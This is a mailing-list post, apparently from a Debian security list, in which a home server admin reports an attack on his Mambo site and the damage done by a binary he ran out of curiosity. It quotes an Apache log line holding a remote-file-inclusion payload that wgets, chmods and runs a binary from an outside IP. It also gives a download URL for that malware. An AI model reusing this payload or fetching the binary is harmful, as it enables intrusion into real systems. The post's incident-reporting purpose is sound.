-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi,
yesterday morning I found a strange entry in my apache log files (debian sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan Server, just serving my Family and some good friends (normally). - ---cut--- 132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.20 3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20YYY;echo| HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" - ---cut--- As I patched mambo against recent "register global" attack and my /tmp is mount noexec, the attack doesn't exploit anything. However, I curiously downloaded this sexy executable to have a closer look. - ---cut--- backup:/home/qmb# ./sexy -h ./sexy <host> <port> - ---cut--- This host backup (sarge, 2.6.12) is in the second raw of my LAN and just used to make rsync backups of LAN hosts to usb hds. Unfortunately, I was that curious, that I decided to strace it (in spite I hardly understand strace): - ---cut--- backup:/home/qmb# strace ./sexy execve("./sexy", ["./sexy"], [/* 20 vars */]) = 0 uname({sys="Linux", node="backup", ...}) = 0 brk(0) = 0x804a000 old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, - -1, 0) = 0xb7f13000 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory) open("/etc/ld.so.cache", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=30780, ...}) = 0 old_mmap(NULL, 30780, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7f0b000 close(3) = 0 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) open("/lib/tls/libc.so.6", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`Z\1\000"..., 512) = 512 fstat64(3, {st_mode=S_IFREG|0755, st_size=1254468, ...}) = 0 old_mmap(NULL, 1264780, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xb7dd6000 old_mmap(0xb7f00000, 36864, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x129000) = 0xb7f00000 old_mmap(0xb7f09000, 7308, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f09000 close(3) = 0 old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, - -1, 0) = 0xb7dd5000 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dd5460, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 munmap(0xb7f0b000, 30780) = 0 fork() = 11935 fstat64(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(136, 0), ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f12000 write(1, "./sexy <host> <port>\n", 21./sexy <host> <port> ) = 21 munmap(0xb7f12000, 4096) = 0 exit_group(2) = ? - ---cut--- After this run the box was hardly damaged: - - It insists on bringing its NIC to promiscuous mode - - ls, grep, gunzip (probably others, too) just give a segmentation fault I tried to investigate further: - - tcpdump doesn't show any traffic in the net that shouldn't be there - - ps ax listed only known processes, all where found in /proc, too - - Top doesn't show anything strange - - netstat -tulpen doesn't list any ports listening Trying rebooting failed totally. It tried to run a lot of grep processes that didn't run etc. It took me 2 hours to return to a normal state with this box (booting knoppix, backup of corrupted /var, blanking the disc, restoring the backup of the night before). In spite I am not that familiar with strace and no coder, I suppose that the program "sexy" damaged the linker (open ld.so.cache) and would have tried to open a ptty on the IP/port given on the command line (As I did not give any command line arguments, this failed). Probably the guy/bot on the other end would have exchanged some libs in this session to install the real rootkit on the box. Right? Though I already invested some time (restoring the host backup), I would be pleased to understand what happened more detailed so any clue is appreciated. If somebody wants to have a closer look at the binary, I think you can still get at: http://212.203.97.120/sexy Does it make any sense to complain at the abuse teams of the involved IPs given in the apache log? TIA. BTW: The name of the binary "sexy", doesn't make it easier to STFW :( PS: Sorry, to all I bothered when sending this message to the private list ([EMAIL PROTECTED]) first. - -- - - maik -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFD1IZcz3bq6aadmI8RAqJ+AKD9sCQ3QepX/lkIdIQ6N920X/k3dACfUXeu r7ifEDOnzI4ov5ipc1wpM+k= =9wQq -----END PGP SIGNATURE----- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
